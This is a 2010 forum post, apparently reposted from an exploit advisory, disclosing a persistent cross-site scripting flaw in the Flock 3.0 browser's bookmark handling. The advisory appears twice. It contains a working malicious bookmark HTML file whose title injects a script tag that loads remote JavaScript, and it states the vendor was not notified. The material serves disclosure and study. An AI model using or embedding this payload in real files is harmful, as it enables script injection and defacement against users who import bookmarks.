Home
Latest images
Search
Register
Log inFlock Browser 3.0.0.3989 Malformed Bookmark XSS
Page 1 of 1
Flock Browser 3.0.0.3989 Malformed Bookmark XSS
andry Wed Sep 15, 2010 3:36 am
#########################################
Flock Browser 3.0.0.3989 Malformed Bookmark XSS
Vendor URL: http://beta.flock.com/
Vendor notify:NO exploits availables:YES
#########################################
Flock is faster, simpler, and more friendly. Literally.
It's the only sleek, modern web browser with the built-in
ability to keep you up-to-date with your Facebook and Twitter
friends.This browser version (3.0.0.3989) is based in a old
chromium project
Flock has a flaw that allows Cross-site scripting style attacks
In bookmarks is has a Malformed bookmark title persistent xss
when inport from other browsers a malformed bookmark or when add
a new malformed bookmark or import a bookmark html file.
###############################
Example Of Bookmark html file
###############################
<!DOCTYPE NETSCAPE-Bookmark-file-1>
<!-- This is an automatically generated file.
It will be read and overwritten.
DO NOT EDIT! -->
<META HTTP-EQUIV="Content-Type" CONTENT="text/html; charset=UTF-8">
<TITLE>Bookmarks</TITLE>
<H1>Menú Marcadores</H1>
<DL><p>
<DT><A HREF="http://www.mozilla.org" ADD_DATE="1282083605" LAST_MODIFIED="1282083638">"><script
src='http://vuln.xssed.net/thirdparty/scripts/ckers.org.js'></A>
</DL><p>
#####################EOF##################
It is a persintent script insercion and when the user click in the menu for view
favorites page or access directly to favorites url this make a "defacement" of this page and them the user can´t access to favorites
( Url of favorites => chrome-extension://flock_people/favorites.html#p=1&v=all&o=0&s=title )
################# €nd #######################
Flock Browser 3.0.0.3989 Malformed Bookmark XSS
Vendor URL: http://beta.flock.com/
Vendor notify:NO exploits availables:YES
#########################################
Flock is faster, simpler, and more friendly. Literally.
It's the only sleek, modern web browser with the built-in
ability to keep you up-to-date with your Facebook and Twitter
friends.This browser version (3.0.0.3989) is based in a old
chromium project
Flock has a flaw that allows Cross-site scripting style attacks
In bookmarks is has a Malformed bookmark title persistent xss
when inport from other browsers a malformed bookmark or when add
a new malformed bookmark or import a bookmark html file.
###############################
Example Of Bookmark html file
###############################
<!DOCTYPE NETSCAPE-Bookmark-file-1>
<!-- This is an automatically generated file.
It will be read and overwritten.
DO NOT EDIT! -->
<META HTTP-EQUIV="Content-Type" CONTENT="text/html; charset=UTF-8">
<TITLE>Bookmarks</TITLE>
<H1>Menú Marcadores</H1>
<DL><p>
<DT><A HREF="http://www.mozilla.org" ADD_DATE="1282083605" LAST_MODIFIED="1282083638">"><script
src='http://vuln.xssed.net/thirdparty/scripts/ckers.org.js'></A>
</DL><p>
#####################EOF##################
It is a persintent script insercion and when the user click in the menu for view
favorites page or access directly to favorites url this make a "defacement" of this page and them the user can´t access to favorites
( Url of favorites => chrome-extension://flock_people/favorites.html#p=1&v=all&o=0&s=title )
################# €nd #######################
andry- Moderator
- Posts : 467
Join date : 2010-05-07
Similar topics» Avant Browser browser:home Persistent XSS vulnerabilities
» Orca Browser browser:home Persistent XSS vulnerability
» Windows live Messenger malformed file overflow DoS remote exploitation.
» Browser Forensics v1 2010
» Bypassing Browser Memory Protections
» Orca Browser browser:home Persistent XSS vulnerability
» Windows live Messenger malformed file overflow DoS remote exploitation.
» Browser Forensics v1 2010
» Bypassing Browser Memory Protections
Page 1 of 1
Permissions in this forum:
You cannot reply to topics in this forum|
|
|